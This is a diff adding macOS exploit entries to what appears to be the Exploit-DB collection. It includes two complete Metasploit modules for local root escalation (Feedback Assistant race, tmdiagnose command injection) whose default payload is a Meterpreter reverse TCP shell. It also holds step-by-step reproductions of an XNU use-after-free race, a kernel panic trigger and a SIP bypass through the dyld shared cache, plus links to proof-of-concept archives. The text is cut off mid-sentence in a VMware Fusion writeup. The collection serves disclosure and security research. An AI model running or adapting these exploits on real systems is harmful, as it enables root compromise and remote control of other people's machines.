+Projects-Mac-mini:mount_cwd projectzero$ 
+Projects-Mac-mini:mount_cwd projectzero$ mkdir mnt
+Projects-Mac-mini:mount_cwd projectzero$ 
+======================================================
+
+In one terminal, launch the dtrace script as root:
+======================================================
+Projects-Mac-mini:mount_cwd projectzero$ sudo ./test.dtrace 
+dtrace: script './test.dtrace' matched 10 probes
+dtrace: allowing destructive actions
+======================================================
+
+In a second terminal, set up the loop device and launch the ./flipflop2 helper:
+======================================================
+Projects-Mac-mini:mount_cwd projectzero$ hdiutil attach ./mount_cwd.img -nomount
+/dev/disk2                                              
+Projects-Mac-mini:mount_cwd projectzero$ ./flipflop2 
+======================================================
+
+In a third terminal, launch the ./mountloop helper:
+======================================================
+Projects-Mac-mini:mount_cwd projectzero$ ./mountloop /dev/disk2
+umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
+umount failed
+umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
+umount failed
+umount(/Users/projectzero/jannh/mount_cwd/clean/mount_cwd/mnt): Resource busy -- try 'diskutil unmount'
+umount failed
+[...]
+======================================================
+
+(Don't mind the error spew from ./flipflop2 and ./mountloop, that's normal.)
+
+Within a few minutes, the system should panic, with an error report like this:
+======================================================
+*** Panic Report ***
+panic(cpu 0 caller 0xffffff80055f89c5): "vnode_rele_ext: vp 0xffffff80276ee458 kusecount(4) out of balance with usecount(3).  v_tag = 25, v_type = 2, v_flag = 84800."@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.270.47/bsd/vfs/vfs_subr.c:1937
+Backtrace (CPU 0), Frame : Return Address
+0xffffff911412b9d0 : 0xffffff80053ad6ed mach_kernel : _handle_debugger_trap + 0x47d
+0xffffff911412ba20 : 0xffffff80054e9185 mach_kernel : _kdp_i386_trap + 0x155
+0xffffff911412ba60 : 0xffffff80054da8ba mach_kernel : _kernel_trap + 0x50a
+0xffffff911412bad0 : 0xffffff800535ab40 mach_kernel : _return_from_trap + 0xe0
+0xffffff911412baf0 : 0xffffff80053ad107 mach_kernel : _panic_trap_to_debugger + 0x197
+0xffffff911412bc10 : 0xffffff80053acf53 mach_kernel : _panic + 0x63
+0xffffff911412bc80 : 0xffffff80055f89c5 mach_kernel : _vnode_rele_internal + 0xf5
+0xffffff911412bcc0 : 0xffffff8005607f34 mach_kernel : _dounmount + 0x524
+0xffffff911412bd60 : 0xffffff8005607877 mach_kernel : _unmount + 0x197
+0xffffff911412bf40 : 0xffffff80059b92ad mach_kernel : _unix_syscall64 + 0x27d
+0xffffff911412bfa0 : 0xffffff800535b306 mach_kernel : _hndl_unix_scall64 + 0x16
+
+BSD process name corresponding to current thread: umount
+Boot args: -zp -v keepsyms=1
+
+Mac OS version:
+18G87
+
+Kernel version:
+Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/RELEASE_X86_64
+Kernel UUID: 982F17B3-0252-37FB-9869-88B3B1C77335
+Kernel slide:     0x0000000005000000
+Kernel text base: 0xffffff8005200000
+__HIB  text base: 0xffffff8005100000
+System model name: Macmini7,1 (Mac-35C5E08120C7EEAF)
+
+System uptime in nanoseconds: 390113393507
+last loaded kext at 197583647618: com.apple.filesystems.msdosfs 1.10 (addr 0xffffff7f89287000, size 69632)
+last unloaded kext at 61646619017: com.apple.driver.AppleIntelLpssGspi  3.0.60 (addr 0xffffff7f88208000, size 45056)
+[...]
+======================================================
\ No newline at end of file
diff --git a/exploits/macos/dos/47791.txt b/exploits/macos/dos/47791.txt
new file mode 100644
index 000000000..7d4ad1591
--- /dev/null
+++ b/exploits/macos/dos/47791.txt
@@ -0,0 +1,39 @@
+The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges.
+
+The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code:
+
+	static int
+	wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
+	{
+	...
+			error = falloc(p, &fp, &indx, ctx);
+			if (error) goto cleanup;
+			fp_alloc_successful = true;
+	...
+			proc_fdlock(p);
+			procfdtbl_releasefd(p, indx, NULL);
+			fp_drop(p, indx, fp, 1);
+			proc_fdunlock(p);
+	...
+			error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
+			if (error) goto cleanup;
+	...
+	cleanup:
+			if (error) {
+				if (fp_alloc_successful) fp_free(p, indx, fp);
+	...
+	}
+
+First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running.
+
+This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else.
+
+One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible.
+
+The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for. Usually this will generate a panic with the message "a freed zone element has been modified".
+
+Tested on macOS 10.14.6 (18G87).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47791.zip
\ No newline at end of file
diff --git a/exploits/macos/local/46724.txt b/exploits/macos/local/46724.txt
new file mode 100644
index 000000000..4650f1f50
--- /dev/null
+++ b/exploits/macos/local/46724.txt
@@ -0,0 +1,28 @@
+Exploit Title: Code execution via path traversal
+# Date: 17-04-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: http://evernote.com/
+# Software Link: https://evernote.com/download
+# Version: 7.9
+# Tested on: macOS Mojave v10.14.4
+# CVE: CVE-2019-10038
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-10038
+# https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
+
+Summary:
+A local file path traversal issue exists in Evernote 7.9 for macOS which
+allows an attacker to execute arbitrary programs.
+
+Technical observation:
+A crafted URI can be used in a note to perform this attack using file:///
+has an argument or by traversing to any directory like
+(../../../../something.app).
+
+Since, Evernote also has a feature of sharing notes, in such case attacker
+could leverage this vulnerability and send crafted notes (.enex) to the
+victim to perform any further attack.
+
+Patch:
+The patch for this issue is released in Evernote 7.10 Beta 1 for macOS
+[MACOSNOTE-28840]. Also, the issue is tracked by CVE-2019-10038.
\ No newline at end of file
diff --git a/exploits/macos/local/46914.rb b/exploits/macos/local/46914.rb
new file mode 100755
index 000000000..716fcb9fb
--- /dev/null
+++ b/exploits/macos/local/46914.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Mac OS X Feedback Assistant Race Condition',
+      'Description'   => %q{
+        This module exploits a race condition vulnerability in Mac's Feedback Assistant.
+        A successful attempt would result in remote code execution under the context of
+        root.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'CodeColorist', # Discovery and exploit
+          'timwr',        # Metasploit module
+      ],
+      'References'     => [
+          ['CVE', '2019-8565'],
+          ['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe'],
+          ['URL', 'https://support.apple.com/en-in/HT209600'],
+          ['URL', 'https://github.com/ChiChou/sploits'],
+      ],
+      'SessionTypes'   => [ 'meterpreter', 'shell' ],
+      'Platform'       => [ 'osx', 'python', 'unix' ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+      'Targets'        => [
+          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload',                { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload',               { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+      ],
+      'DisclosureDate' => 'Apr 13 2019'))
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def upload_executable_file(filepath, filedata)
+    print_status("Uploading file: '#{filepath}'")
+    write_file(filepath, filedata)
+    chmod(filepath)
+    register_file_for_cleanup(filepath)
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version >= Gem::Version.new('10.14.4')
+      CheckCode::Safe
+    else
+      CheckCode::Appears
+    end
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    case target['Arch']
+    when ARCH_X64
+      payload_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
+      binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+      upload_executable_file(payload_file, binary_payload)
+      root_cmd = payload_file
+    when ARCH_PYTHON
+      root_cmd = "echo \"#{payload.encoded}\" | python"
+    else
+      root_cmd = payload.encoded
+    end
+    root_cmd = root_cmd + " & \0"
+    if root_cmd.length > 1024
+      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
+    end
+
+    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8565", "exploit" ))
+    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
+    exploit_data[placeholder_index, root_cmd.length] = root_cmd
+
+    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
+    upload_executable_file(exploit_file, exploit_data)
+
+    print_status("Executing exploit '#{exploit_file}'")
+    result = cmd_exec(exploit_file)
+    print_status("Exploit result:\n#{result}")
+  end
+end
\ No newline at end of file
diff --git a/exploits/macos/local/47070.rb b/exploits/macos/local/47070.rb
new file mode 100755
index 000000000..24789ce14
--- /dev/null
+++ b/exploits/macos/local/47070.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
+      'Description'   => %q{
+          This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
+        order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
+        from a command injection vulnerability that can be exploited by creating a
+        specially crafted disk label.
+
+          The tmdiagnose binary uses awk to list every mounted volume, and composes
+        shell commands based on the volume labels. By creating a volume label with the
+        backtick character, we can have our own binary executed with root priviledges.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'CodeColorist', # Discovery and exploit
+          'timwr',        # Metasploit module
+      ],
+      'References'     => [
+          ['CVE', '2019-8513'],
+          ['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
+          ['URL', 'https://support.apple.com/en-in/HT209600'],
+          ['URL', 'https://github.com/ChiChou/sploits'],
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+      'Targets'        => [
+          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload',                { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload',               { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+      ],
+      'DisclosureDate' => 'Apr 13 2019'))
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def upload_executable_file(filepath, filedata)
+    print_status("Uploading file: '#{filepath}'")
+    write_file(filepath, filedata)
+    chmod(filepath)
+    register_file_for_cleanup(filepath)
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version >= Gem::Version.new('10.14.4')
+      CheckCode::Safe
+    else
+      CheckCode::Appears
+    end
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))
+    if target['Arch'] == ARCH_X64
+      root_cmd = payload.encoded
+    else
+      root_cmd = payload.raw
+      if target['Arch'] == ARCH_PYTHON
+        root_cmd = "echo \"#{root_cmd}\" | python"
+      end
+      root_cmd = "CMD:#{root_cmd}"
+    end
+    if root_cmd.length > 1024
+      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
+    end
+
+    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
+    exploit_data[placeholder_index, root_cmd.length] = root_cmd
+
+    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
+    upload_executable_file(exploit_file, exploit_data)
+
+    print_status("Executing exploit '#{exploit_file}'")
+    result = cmd_exec(exploit_file)
+    print_status("Exploit result:\n#{result}")
+  end
+end
\ No newline at end of file
diff --git a/exploits/macos/local/47400.md b/exploits/macos/local/47400.md
new file mode 100644
index 000000000..bf2fe516a
--- /dev/null
+++ b/exploits/macos/local/47400.md
@@ -0,0 +1,54 @@
+# macOS-Kernel-Exploit
+
+## DISCLAIMER
+You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for
+security researchers in a controlled lab environment.
+
+This exploit is intended for security research purposes only.
+
+## General
+macOS Kernel Exploit for CVE-????-???? (currently a 0day. 
+I'll add the CVE# once it is published ;) ). 
+
+Thanks to @LinusHenze for this cool bug and his support ;P.
+
+## Writeup
+
+Probably coming soon.
+If you want to try and exploit it yourself, here are a few things to get you started:
+
+- VM: Download the macOS installer from the appstore and drag the `.app` file into VMWare's `NEW VM` window
+- Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb
+- Have a look at the _kernel_trap function
+
+
+## Build
+
+I recommend setting the bootargs to: `debug=0x44 kcsuffix=development -v `
+
+:warning: **Note**: SMAP needs to be disabled on macs after 2015 (`-pmap_smap_disable`)
+
+You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit)
+Downloading Xcode 9.4.1 Commandline Tools should be enough ;)
+Download: https://developer.apple.com/download/more/
+
+```
+make
+```
+
+## Execution
+
+```
+./exploit <KASLR slide>
+```
+
+Tested on macOS Mojave: `Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64`
+
+**Demo**:
+
+[![asciicast](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU.png)](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU)
+
+
+- - - 
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47400.zip
\ No newline at end of file
diff --git a/exploits/macos/local/47708.txt b/exploits/macos/local/47708.txt
new file mode 100644
index 000000000..92f90b635
--- /dev/null
+++ b/exploits/macos/local/47708.txt
@@ -0,0 +1,264 @@
+Tested on macOS Mojave (10.14.6, 18G87) and Catalina Beta (10.15 Beta 19A536g).
+
+On macOS, the dyld shared cache (in /private/var/db/dyld/) is generated locally
+on the system and therefore doesn't have a real code signature;
+instead, SIP seems to be the only mechanism that prevents modifications of the
+dyld shared cache.
+update_dyld_shared_cache, the tool responsible for generating the shared cache,
+is able to write to /private/var/db/dyld/ because it has the
+com.apple.rootless.storage.dyld entitlement. Therefore, update_dyld_shared_cache
+is responsible for ensuring that it only writes data from trustworthy libraries
+when updating the shared cache.
+
+update_dyld_shared_cache accepts two interesting command-line arguments that
+make it difficult to enforce these security properties:
+
+ - "-root": Causes libraries to be read from, and the cache to be written to, a
+   caller-specified filesystem location.
+ - "-overlay": Causes libraries to be read from a caller-specified filesystem
+   location before falling back to normal system directories.
+
+There are some checks related to this, but they don't look very effective.
+main() tries to see whether the target directory is protected by SIP:
+
+    bool requireDylibsBeRootlessProtected = isProtectedBySIP(cacheDir);
+
+If that variable is true, update_dyld_shared_cache attempts to ensure that all
+source libraries are also protected by SIP.
+
+isProtectedBySIP() is implemented as follows:
+
+    bool isProtectedBySIP(const std::string& path)
+    {
+        if ( !sipIsEnabled() )
+            return false;
+
+        return (rootless_check_trusted(path.c_str()) == 0);
+    }
+
+Ignoring that this looks like a typical symlink race issue, there's another
+problem:
+
+Looking in a debugger (with SIP configured so that only debugging restrictions
+and dtrace restrictions are disabled), it seems like rootless_check_trusted()
+doesn't work as expected:
+
+    bash-3.2# lldb /usr/bin/update_dyld_shared_cache 
+    [...]
+    (lldb) breakpoint set --name isProtectedBySIP(std::__1::basic_string<char,\ std::__1::char_traits<char>,\ std::__1::allocator<char>\ >\ const&) 
+    Breakpoint 1: where = update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&), address = 0x00000001000433a4
+    [...]
+    (lldb) run -force
+    Process 457 launched: '/usr/bin/update_dyld_shared_cache' (x86_64)
+    Process 457 stopped
+    * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
+        frame #0: 0x00000001000433a4 update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&)
+    update_dyld_shared_cache`isProtectedBySIP:
+    ->  0x1000433a4 <+0>: pushq  %rbp
+        0x1000433a5 <+1>: movq   %rsp, %rbp
+        0x1000433a8 <+4>: pushq  %rbx
+        0x1000433a9 <+5>: pushq  %rax
+    Target 0: (update_dyld_shared_cache) stopped.
+    (lldb) breakpoint set --name rootless_check_trusted
+    Breakpoint 2: where = libsystem_sandbox.dylib`rootless_check_trusted, address = 0x00007fff5f32b8ea
+    (lldb) continue 
+    Process 457 resuming
+    Process 457 stopped
+    * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
+        frame #0: 0x00007fff5f32b8ea libsystem_sandbox.dylib`rootless_check_trusted
+    libsystem_sandbox.dylib`rootless_check_trusted:
+    ->  0x7fff5f32b8ea <+0>: pushq  %rbp
+        0x7fff5f32b8eb <+1>: movq   %rsp, %rbp
+        0x7fff5f32b8ee <+4>: movl   $0xffffffff, %esi         ; imm = 0xFFFFFFFF 
+        0x7fff5f32b8f3 <+9>: xorl   %edx, %edx
+    Target 0: (update_dyld_shared_cache) stopped.
+    (lldb) print (char*)$rdi
+    (char *) $0 = 0x00007ffeefbff171 "/private/var/db/dyld/"
+    (lldb) finish
+    Process 457 stopped
+    * thread #1, queue = 'com.apple.main-thread', stop reason = step out
+
+        frame #0: 0x00000001000433da update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) + 54
+    update_dyld_shared_cache`isProtectedBySIP:
+    ->  0x1000433da <+54>: testl  %eax, %eax
+        0x1000433dc <+56>: sete   %al
+        0x1000433df <+59>: addq   $0x8, %rsp
+        0x1000433e3 <+63>: popq   %rbx
+    Target 0: (update_dyld_shared_cache) stopped.
+    (lldb) print $rax
+    (unsigned long) $1 = 1
+
+Looking around with a little helper (under the assumption that it doesn't behave
+differently because it doesn't have the entitlement), it looks like only a small
+part of the SIP-protected directories show up as protected when you check with
+rootless_check_trusted():
+
+    bash-3.2# cat rootless_test.c
+    #include <stdio.h>
+
+    int rootless_check_trusted(char *);
+
+    int main(int argc, char **argv) {
+      int res = rootless_check_trusted(argv[1]);
+      printf("rootless status for '%s': %d (%s)\n", argv[1], res, (res == 0) ? "PROTECTED" : "MALLEABLE");
+    }
+    bash-3.2# ./rootless_test /
+    rootless status for '/': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /System
+    rootless status for '/System': 0 (PROTECTED)
+    bash-3.2# ./rootless_test /System/
+    rootless status for '/System/': 0 (PROTECTED)
+    bash-3.2# ./rootless_test /System/Library
+    rootless status for '/System/Library': 0 (PROTECTED)
+    bash-3.2# ./rootless_test /System/Library/Assets
+    rootless status for '/System/Library/Assets': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /System/Library/Caches
+    rootless status for '/System/Library/Caches': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /System/Library/Caches/com.apple.kext.caches
+    rootless status for '/System/Library/Caches/com.apple.kext.caches': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /usr
+    rootless status for '/usr': 0 (PROTECTED)
+    bash-3.2# ./rootless_test /usr/local
+    rootless status for '/usr/local': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /private
+    rootless status for '/private': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /private/var/db
+    rootless status for '/private/var/db': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /private/var/db/dyld/
+    rootless status for '/private/var/db/dyld/': 1 (MALLEABLE)
+    bash-3.2# ./rootless_test /sbin
+    rootless status for '/sbin': 0 (PROTECTED)
+    bash-3.2# ./rootless_test /Applications/Mail.app/
+    rootless status for '/Applications/Mail.app/': 0 (PROTECTED)
+    bash-3.2# 
+
+Perhaps rootless_check_trusted() limits its trust to paths that are writable
+exclusively using installer entitlements like com.apple.rootless.install, or
+something like that? That's the impression I get when testing different entries
+from /System/Library/Sandbox/rootless.conf - the entries with no whitelisted
+specific entitlement show up as protected, the ones with a whitelisted specific
+entitlement show up as malleable.
+rootless_check_trusted() checks for the "file-write-data" permission through the
+MAC syscall, but I haven't looked in detail at how the policy actually looks.
+
+(By the way, looking at update_dyld_shared_cache, I'm not sure whether it would
+actually work if the requireDylibsBeRootlessProtected flag is true - it looks
+like addIfMachO() would never add any libraries to dylibsForCache because
+`sipProtected` is fixed to `false` and the call to isProtectedBySIP() is
+commented out?)
+
+
+In theory, this means it's possible to inject a modified version of a library
+into the dyld cache using either the -root or the -overlay flag of
+update_dyld_shared_cache, reboot, and then run an entitled binary that will use
+the modified library. However, there are (non-security) checks that make this
+annoying:
+
+ - When loading libraries, loadPhase5load() checks whether the st_ino and
+   st_mtime of the on-disk library match the ones embedded in the dyld cache at
+   build time.
+ - Recently, dyld started ensuring that the libraries are all on the "boot
+   volume" (the path specified with "-root", or "/" if no root was specified).
+
+The inode number check means that it isn't possible to just create a malicious
+copy of a system library, run `update_dyld_shared_cache -overlay`, and reboot to
+use the malicious copy; the modified library will have a different inode number.
+I don't know whether HFS+ reuses inode numbers over time, but on APFS, not even
+that is possible; inode numbers are monotonically incrementing 64-bit integers.
+
+Since root (and even normal users) can mount filesystem images, I decided to
+create a new filesystem with appropriate inode numbers.
+I think HFS probably can't represent the full range of inode numbers that APFS
+can have (and that seem to show up on volumes that have been converted from
+HFS+ - that seems to result in inode numbers like 0x0fffffff00001666), so I
+decided to go with an APFS image. Writing code to craft an entire APFS
+filesystem would probably take quite some time, and the public open-source APFS
+implementations seem to be read-only, so I'm first assembling a filesystem image
+normally (create filesystem with newfs_apfs, mount it, copy files in, unmount),
+then renumbering the inodes. By storing files in the right order, I don't even
+need to worry about allocating and deallocating space in tree nodes and
+such - all replacements can be performed in-place.
+
+My PoC patches the cached version of csr_check() from libsystem_kernel.dylib so
+that it always returns zero, which causes the userspace kext loading code to
+ignore code signing errors.
+
+
+To reproduce:
+
+ - Ensure that SIP is on.
+ - Ensure that you have at least something like 8GiB of free disk space.
+ - Unpack the attached dyld_sip.tar (as normal user).
+ - Run ./collect.sh (as normal user). This should take a couple minutes, with
+   more or less continuous status updates. At the end, it should say "READY"
+   after mounting an image to /private/tmp/L.
+   (If something goes wrong here and you want to re-run the script, make sure to
+   detach the volume if the script left it attached - check "hdiutil info".)
+ - As root, run "update_dyld_shared_cache -force -root /tmp/L".
+ - Reboot the machine.
+ - Build an (unsigned) kext from source. I have attached source code for a
+   sample kext as testkext.tar - you can unpack it and use xcodebuild -, but
+   that's just a simple "hello world" kext, you could also use anything else.
+ - As root, copy the kext to /tmp/.
+ - As root, run "kextutil /tmp/[...].kext". You should see something like this:
+
+         bash-3.2# cp -R testkext/build/Release/testkext.kext /tmp/ && kextutil /tmp/testkext.kext
+         Kext with invalid signatured (-67050) allowed: <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
+         Code Signing Failure: code signature is invalid
+         Disabling KextAudit: SIP is off
+         Invalid signature -67050 for kext <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
+         bash-3.2# dmesg|tail -n1
+         test kext loaded
+         bash-3.2# kextstat | grep test
+           120    0 0xffffff7f82a50000 0x2000     0x2000     net.thejh.test.testkext (1) A24473CD-6525-304A-B4AD-B293016E5FF0 <5>
+         bash-3.2# 
+
+
+Miscellaneous notes:
+
+ - It looks like there's an OOB kernel write in the dyld shared cache pager; but
+   AFAICS that isn't reachable unless you've already defeated SIP, so I don't
+   think it's a vulnerability:
+   vm_shared_region_slide_page_v3() is used when a page from the dyld cache is
+   being paged in. It essentially traverses a singly-linked list of relocations
+   inside the page; the offset of the first relocation (iow the offset of the
+   list head) is stored permanently in kernel memory when the shared cache is
+   initialized.
+   As far as I can tell, this function is missing bounds checks; if either the
+   starting offset or the offset stored in the page being paged in points
+   outside the page, a relocation entry will be read from OOB memory, and a
+   relocated address will conditionally be written back to the same address.
+ - There is a check `rootPath != "/"` in update_dyld_shared_cache; but further
+   up is this:
+
+       // canonicalize rootPath
+       if ( !rootPath.empty() ) {
+           char resolvedPath[PATH_MAX];
+           if ( realpath(rootPath.c_str(), resolvedPath) != NULL ) {
+               rootPath = resolvedPath;
+           }
+           // <rdar://problem/33223984> when building closures for boot volume, pathPrefixes should be empty
+           if ( rootPath == "/" ) {
+               rootPath = "";
+           }
+       }
+
+   So as far as I can tell, that condition is always true, which means that when
+   an overlay path is specified with `-overlay`, the cache is written to the
+   root even though the code looks as if the cache is intended to be written to
+   the overlay.
+ - Some small notes regarding the APFS documentation at
+   <https://developer.apple.com/support/downloads/Apple-File-System-Reference.pdf>:
+  - The typedef for apfs_superblock_t is missing.
+  - The documentation claims that APFS_TYPE_DIR_REC keys are j_drec_key_t, but
+    actually they can be j_drec_hashed_key_t.
+  - The documentation claims that o_cksum is "The Fletcher 64 checksum of the
+    object", but actually APFS requires that the fletcher64 checksum of all data
+    behind the checksum concatenated with the checksum is zero.
+    (In other words, you cut out the checksum field at the start, append it at
+    the end, then run fletcher64 over the buffer, and then you have to get an
+    all-zeroes checksum.)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip
\ No newline at end of file
diff --git a/exploits/macos/local/48232.md b/exploits/macos/local/48232.md
new file mode 100644
index 000000000..37d205307
--- /dev/null
+++ b/exploits/macos/local/48232.md
@@ -0,0 +1,148 @@
+Local Privilege Escalation via VMWare Fusion
+
+Overview:
+A directory traversal vulnerability in VMware Fusion's SUID binaries can allow
+an attacker to run commands as the root user.
+
+Tested Versions:
+* VMware Fusion 10.1.3 (9472307) on macOS 10.13.6
+* VMware Fusion 11.0.0 (10120384) on macOS 10.14.1
+* VMware Fusion 11.0.2 (10952296) on macOS 10.14.1
+* VMware Fusion 11.5.0 (14634996) on macOS 10.15.1
+* VMware Fusion 11.5.1 (15018442) on macOS 10.15.1
+
+Exercising:
+1) Ensure the VMware Fusion services are not running. If open, quit the VMware
+   Fusion GUI.
+2) Run one of the exploit script (exploit_fusion.sh or exploit_usb.sh). They
